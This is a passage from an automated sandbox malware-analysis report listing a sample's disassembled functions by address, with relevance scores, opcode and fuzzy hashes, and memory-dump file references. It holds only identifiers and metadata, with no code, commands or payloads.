                                                                • Opcode ID: 66fc7aed1a8be8ccd294b787b10f7637c6460e08ac4ddc991a7a79f79a43bdae
                                                                • Instruction ID: 215f1f7ad76cb5e29d203a8e72619c232785cbb6128a2769862968d3b8123e0b
                                                                • Opcode Fuzzy Hash: 66fc7aed1a8be8ccd294b787b10f7637c6460e08ac4ddc991a7a79f79a43bdae
                                                                • Instruction Fuzzy Hash: 88D01270E99288A6DB209A546E47BADBE348703711F101199E6097B1C1D5A24524859E
                                                                Function 004128D7 Relevance: 1.3, APIs: 1, Instructions: 20COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CoInitialize.OLE32(00000000), ref: 004128E8
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Initialize
                                                                • String ID:
                                                                • API String ID: 2538663250-0
                                                                • Opcode ID: 6106afc6b463506a3d15d7cc0c1d065843dc2ae394bd4a9818a2266fe2776213
                                                                • Instruction ID: d7d17ad1607ca0c7eb991b064609c80ca49ef72590fe3187da1aa4f2f4a81fed
                                                                • Opcode Fuzzy Hash: 6106afc6b463506a3d15d7cc0c1d065843dc2ae394bd4a9818a2266fe2776213
                                                                • Instruction Fuzzy Hash: 97D05EB0E8534CB7D610AE946E03B6CB6388702711F0011A5FA083A1C1E5A25920859E
                                                                Function 004A8537 Relevance: .6, Instructions: 638COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d2b66dd9a9f32c94accd8e7871ae87e893a5dabaf2604c02de9f0319e8ea187d
                                                                • Instruction ID: 73525090d100d1b689769259d6e8df4be22ea82b0becd013ba7d668fe31f7c2f
                                                                • Opcode Fuzzy Hash: d2b66dd9a9f32c94accd8e7871ae87e893a5dabaf2604c02de9f0319e8ea187d
                                                                • Instruction Fuzzy Hash: 481253B5A40205AFEB40DF69DCC1B6EB7B4EF59314F14003EEA05AB342D679AD10CB66
                                                                Function 0047246B Relevance: .5, Instructions: 493COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 17a508dafd5dbd71d142c366072afcc99054add45cf44ebf661ac186e40ff384
                                                                • Instruction ID: 524ba1de275a5ad88e77a61d6b8ecb99ac96038a8be4e3611194671a491f388e
                                                                • Opcode Fuzzy Hash: 17a508dafd5dbd71d142c366072afcc99054add45cf44ebf661ac186e40ff384
                                                                • Instruction Fuzzy Hash: A3F165B1E40205ABFB00DFA5DDC1B9EB7B4EF58314F184439EA05BB382D6B9AD108765
                                                                Function 004DA9AC Relevance: .4, Instructions: 417COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b2df94a90afe756ece2eeef9b291eab2c7b6b4670fcf9022f6fa71496ac36da8
                                                                • Instruction ID: abfaadfb4e953f60e3ac1b7febbeef20403e656696d59726b049b64b0493a492
                                                                • Opcode Fuzzy Hash: b2df94a90afe756ece2eeef9b291eab2c7b6b4670fcf9022f6fa71496ac36da8
                                                                • Instruction Fuzzy Hash: C9E1EB31E5520A8FEB25CF64C9257FE7BB2AB44315F28002BD441A6381D77C99A2DB1F
                                                                Function 0042EC66 Relevance: .3, Instructions: 293COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e8d49e6f2535195e476d34325a4766fe041d3d0ef9c0bd7c2de3a604d455aef4
                                                                • Instruction ID: 72924ec4050420736342319aad4d9f05c922e2c9a2ff4ebac71ea84c587418c5
                                                                • Opcode Fuzzy Hash: e8d49e6f2535195e476d34325a4766fe041d3d0ef9c0bd7c2de3a604d455aef4
                                                                • Instruction Fuzzy Hash: 99918033A04DB24AEB268A3EEC411717752FF9332079E475ED991973E6D7396842C348
                                                                Function 004D4700 Relevance: .3, Instructions: 259COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: fc60ecf50bd115ca0c6ea2745a91e2bccda0b72c85d336beea95e2ba67d1c3a9
                                                                • Instruction ID: 78c0eda2b33601a78873b5e7e4229798324ad5b420cd73b80ff272b8de0a6352
                                                                • Opcode Fuzzy Hash: fc60ecf50bd115ca0c6ea2745a91e2bccda0b72c85d336beea95e2ba67d1c3a9
                                                                • Instruction Fuzzy Hash: 65B19F75900246DFDB15CF14C5E0AA9BBA1BF99318F24C1AFD85A5B382C735EE42CB90
                                                                Function 004B0060 Relevance: .2, Instructions: 214COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7a472fa17fbdad7226fb6c1677ee9a149846a37b4dceea3494ab88ff08fd0b2b
                                                                • Instruction ID: 6b4963cd8c7819de37a231c7e626f68aa0c4fc113ec6d7dd295f1a62de52ad27
                                                                • Opcode Fuzzy Hash: 7a472fa17fbdad7226fb6c1677ee9a149846a37b4dceea3494ab88ff08fd0b2b
                                                                • Instruction Fuzzy Hash: 706181B5B40314AFEB04DB55DCC7FAE7764EF19315F04006AE608AB382E275AE548B39
                                                                Function 0040ECF1 Relevance: .2, Instructions: 212COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c779fb4ef24ff679b0b828e31fc249fc0eb1e64ee077276599d8199f26672727
                                                                • Instruction ID: 088e0e9fd8233b3fac55ec848e1cc29c4765396e9c2f222dc305d0784f73fcc8
                                                                • Opcode Fuzzy Hash: c779fb4ef24ff679b0b828e31fc249fc0eb1e64ee077276599d8199f26672727
                                                                • Instruction Fuzzy Hash: B7617471F40319BBEB10DFA2DC42BBE77B4EB19701F14446AF904BA2C1D6759A20C76A
                                                                Function 004A8BD4 Relevance: .2, Instructions: 177COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a15738efc5d9ee030b6beb6f02a114080220149d5ae4fb389c86da256831d1c7
                                                                • Instruction ID: 60e983cbe75c51072007bc385c4bac21888707c6fe4aab7966800e1e06dae8f2
                                                                • Opcode Fuzzy Hash: a15738efc5d9ee030b6beb6f02a114080220149d5ae4fb389c86da256831d1c7
                                                                • Instruction Fuzzy Hash: 945194B1E00304BFEB40DFA9DCC5B5AB3F4EB19314F14406AEA05AB382D6799E008B56
                                                                Function 00652449 Relevance: .1, Instructions: 149COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 475775355d1bf22fd8f870f090f357aa3ee9bb253f7649f5d9849d353dfab7c3
                                                                • Instruction ID: 796f80a431399d2c786c37bd3ad28063f583007af7e7953f7c0c8d154c619eda
                                                                • Opcode Fuzzy Hash: 475775355d1bf22fd8f870f090f357aa3ee9bb253f7649f5d9849d353dfab7c3
                                                                • Instruction Fuzzy Hash: D3510771D0021ADFDB14CFE8C8917EEBBF6BB09305F24806AD905E7241D3759A8ACB91
                                                                Function 00470D4D Relevance: .1, Instructions: 128COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1012a71ab87a2eaf9a36830b872788dc5e9d541f60f3667bd8db6aa46cfbca23
                                                                • Instruction ID: 065eb0975ed8d0bece88330ffdef0e47985c973718afb47ca9915d339a61224b
                                                                • Opcode Fuzzy Hash: 1012a71ab87a2eaf9a36830b872788dc5e9d541f60f3667bd8db6aa46cfbca23
                                                                • Instruction Fuzzy Hash: 2D410775D0020DFFDF10DFA5C881BDEBBB5FB08304F00846AEA18A6262D7399A64DB55
                                                                Function 00470859 Relevance: .1, Instructions: 85COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 55d412ac8d72e8da1acced7d8571ce135ce1fb68657f4aa0632c55276a27e481
                                                                • Instruction ID: e849f5fb9b5cdbd5284e4c8c3c965d279e33a78a9e43fbcde4ab1956b605e7e5
                                                                • Opcode Fuzzy Hash: 55d412ac8d72e8da1acced7d8571ce135ce1fb68657f4aa0632c55276a27e481
                                                                • Instruction Fuzzy Hash: B63182F5D01309FBEB10EFA1D845BEE7BB8AB04304F00947BE508A6292D7798A44CB95
                                                                Function 0043E178 Relevance: .1, Instructions: 70COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4249cfad71cd508aed1064edfcc292b1c52a1e06b11048ffa581530a86ec5dcd
                                                                • Instruction ID: 778f49e62a48209429d5d9565252f2145ea98824f5c2dac6de0a64bd32592418
                                                                • Opcode Fuzzy Hash: 4249cfad71cd508aed1064edfcc292b1c52a1e06b11048ffa581530a86ec5dcd
                                                                • Instruction Fuzzy Hash: 241172B2E00208BBDF50DFA5DC46F9F7BBCEB0C304F14545AFA04A6292D6759A209B59
                                                                Function 004502FE Relevance: .1, Instructions: 68COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
